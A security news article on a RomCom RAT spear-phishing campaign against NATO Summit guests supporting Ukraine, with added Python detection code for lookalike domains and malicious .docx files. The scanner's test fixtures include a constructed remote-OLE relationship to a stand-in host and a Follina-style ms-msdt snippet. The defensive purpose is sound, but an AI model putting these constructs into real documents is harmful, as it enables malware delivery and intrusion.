RomCom RAT attackers target groups supporting NATO membership of Ukraine

Pierluigi Paganini July 10, 2023

Threat actors are targeting NATO and groups supporting Ukraine in a spear-phishing campaign distributing the RomCom RAT.

On July 4, the BlackBerry Threat Research and Intelligence team uncovered a spear phishing campaign aimed at an organization supporting Ukraine abroad.

The researchers discovered two lure documents submitted from an IP address in Hungary, both targeting upcoming NATO Summit guests who are providing support to Ukraine.

The two lure documents identified by BlackBerry impersonate the Ukrainian World Congress, a legitimate non-profit. One (“Overview_of_UWCs_UkraineInNATO_campaign.docx“) poses as an overview of the organization's campaign for Ukraine's NATO membership; the other (“Letter_NATO_Summit_Vilnius_2023_ENG(1).docx“) appears as a letter declaring support for the Ukrainian government's inclusion in the NATO alliance.

The experts attributed the attacks to a threat actor known as RomCom (aka Tropical Scorpius and UNC2596) based on tactics, techniques, and procedures (TTPs), code similarity, and attack infrastructure.

The upcoming NATO Summit will be held in Vilnius on July 11-12; Ukraine's possible future membership in the alliance is one of the topics to be discussed during the event.

The threat actors aimed to lure victims into visiting a specially crafted replica of the Ukrainian World Congress website.

The attackers registered a lookalike domain that reuses the legitimate name under a different top-level domain (.info instead of .org), a typosquatting-style trick that makes the fake website look legitimate at a glance.

Real domain: ukrainianworldcongress[.]org
Fake domain: ukrainianworldcongress[.]info
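The domain swap in the table is the kind of thing a defender can check mechanically. The following is an added example (not code from BlackBerry's report or from this article) that flags lookalikes of a set of protected domains: the same registrable label under another TLD, as in this campaign, and single-character typosquats. The only real domains in it are the two from the table; every other domain passed to it below is constructed sample input, and the two-label split assumes plain TLDs (it does not handle suffixes such as .co.uk).

```python
"""Flag lookalike domains for a set of protected brand domains.

Added illustration, not from BlackBerry's report. The protected list holds
the real domain from the article; the candidate domains in the usage at the
bottom are constructed examples.
"""

# Domains the organisation actually owns (from the article).
PROTECTED = ["ukrainianworldcongress.org"]


def split_domain(domain):
    """Return (second-level label, TLD) for a domain.

    Defanged brackets such as '[.]' are stripped first. Only the last two
    labels are used, so 'www.example.org' -> ('example', 'org'). Multi-part
    public suffixes (co.uk, com.au) are not handled; that is an assumption.
    """
    d = domain.lower().strip().replace("[.]", ".").rstrip(".")
    labels = d.split(".")
    if len(labels) < 2 or not all(labels):
        raise ValueError(f"not a registrable domain: {domain!r}")
    return labels[-2], labels[-1]


def edit_distance(a, b):
    """Levenshtein distance, used to catch single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def classify(candidate, protected=PROTECTED):
    """Classify a candidate domain against the protected list.

    Returns 'legitimate', 'tld-swap' (same label, other TLD: the case in
    this campaign), 'typosquat' (label within one edit) or 'unrelated'.
    Checks are ordered so an exact match always wins over a near miss.
    """
    c_sld, c_tld = split_domain(candidate)
    parsed = [split_domain(p) for p in protected]
    if (c_sld, c_tld) in parsed:
        return "legitimate"
    if any(c_sld == r_sld for r_sld, _ in parsed):
        return "tld-swap"
    if any(edit_distance(c_sld, r_sld) <= 1 for r_sld, _ in parsed):
        return "typosquat"
    return "unrelated"


if __name__ == "__main__":
    # Constructed candidates: the real site, the fake from the article,
    # a dropped-letter typosquat and an unrelated domain.
    for d in ["ukrainianworldcongress[.]org", "ukrainianworldcongress[.]info",
              "ukrainianworldcongres[.]org", "example[.]com"]:
        print(f"{d:35} {classify(d)}")
```

Feed it the domains seen in proxy logs or newly observed domain feeds; anything that comes back as tld-swap or typosquat against your own brands deserves a look before users start clicking on it.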

The cloned websites were spotted hosting weaponized versions of popular software.

“Once the Microsoft Word file is downloaded and executed/opened by the user, an OLE object is loaded from the RTF, which connects to the IP address 104.234.239[.]26, which is related to VPN/proxies services. The connections are made to ports 80, 139, and 445 (HTTP and SMB services).” reads the report published by BlackBerry. “This file’s goal is to load the OLE streams into Microsoft Word, to render an iframe tag responsible for the execution of the next stage of malware.”

Opening the documents triggers a multi-stage attack chain that also exploits CVE-2022-30190, known as Follina, a flaw in the Microsoft Support Diagnostic Tool (MSDT).
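The chain described above leaves two things a defender can check statically in the lure document itself: a .docx is a zip archive, and remote content such as the OLE object BlackBerry describes is pulled in through a Relationship entry marked TargetMode="External", while a Follina second stage is an HTML page that invokes an ms-msdt: URI. The following added example (not BlackBerry's code or the article's) scans a .docx for both indicators. The sample document, the host lure.example and the stage-two HTML snippet are constructed for the demonstration; nothing in it is taken from the actual lure files.

```python
"""Triage a .docx for external OLE relationships and MSDT (Follina) URIs.

Added example, not from BlackBerry's report. The .docx built by
build_sample_docx() and the host 'lure.example' are constructed test data.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def contains_msdt(blob: bytes) -> bool:
    """True if a part (or a fetched second-stage page) carries an ms-msdt: URI."""
    return MSDT_RE.search(blob) is not None


def scan_docx(data: bytes) -> dict:
    """Return external relationships, external OLE objects, parts with
    ms-msdt: URIs and the remote hosts referenced by the document."""
    findings = {"external": [], "ole_external": [], "msdt": [], "hosts": set()}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            if contains_msdt(blob):          # URI embedded directly in a part
                findings["msdt"].append(name)
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(blob)
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue                 # internal parts are normal
                target = rel.get("Target", "")
                rtype = rel.get("Type", "")
                entry = (name, rtype.rsplit("/", 1)[-1], target)
                findings["external"].append(entry)
                host = urlparse(target).hostname
                if host:
                    findings["hosts"].add(host)
                if rtype == OLE_TYPE:        # remote OLE object, as in this campaign
                    findings["ole_external"].append(entry)
    return findings


def is_suspicious(findings: dict) -> bool:
    """External OLE objects or MSDT URIs are not things a letter needs."""
    return bool(findings["ole_external"] or findings["msdt"])


# Constructed sample document parts (not the real lure).
_RELS_HEAD = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
              '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
              '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>')
_RELS_OLE = ('<Relationship Id="rId2" Type="' + OLE_TYPE + '" '
             'Target="http://lure.example/word.html!" TargetMode="External"/>')
_DOC_XML = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            '<w:body><w:p><w:r><w:t>Letter</w:t></w:r></w:p></w:body></w:document>')

# Constructed stage-two HTML of the shape Follina exploits use (hypothetical).
SAMPLE_STAGE_HTML = (b'<script>location.href = "ms-msdt:/id PCWDiagnostic '
                     b'/skip force /param \\"IT_RebrowseForFile=..\\"";</script>')


def build_sample_docx(with_lure: bool) -> bytes:
    """Build a minimal .docx in memory, optionally with the remote OLE link."""
    rels = _RELS_HEAD + (_RELS_OLE if with_lure else "") + "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", _DOC_XML)
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, lure in (("lure", True), ("benign", False)):
        f = scan_docx(build_sample_docx(lure))
        print(label, "suspicious" if is_suspicious(f) else "clean", sorted(f["hosts"]))
    print("stage html carries ms-msdt:", contains_msdt(SAMPLE_STAGE_HTML))
```

The hosts the scanner extracts are what you compare against proxy and firewall logs; a Word document that reaches out to a remote OLE object over HTTP or SMB, as the report describes for ports 80, 139 and 445, is the network-side counterpart of the same indicator.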

The final-stage payload is the RomCom RAT, which the operators use to collect information about the compromised system and execute remote commands.

“Based on the available information, we have medium to high confidence to conclude that this is a RomCom rebranded operation, or that one or more members of the RomCom threat group are behind this new campaign supporting a new threat group.” concludes the report. “The information we base this conclusion on includes: 

  • Geopolitical context
  • Domain’s registration and HTML scraping of legitimate websites
  • Certain similarities in the code between this campaign and previously known RomCom campaigns
  • Network infrastructure information”
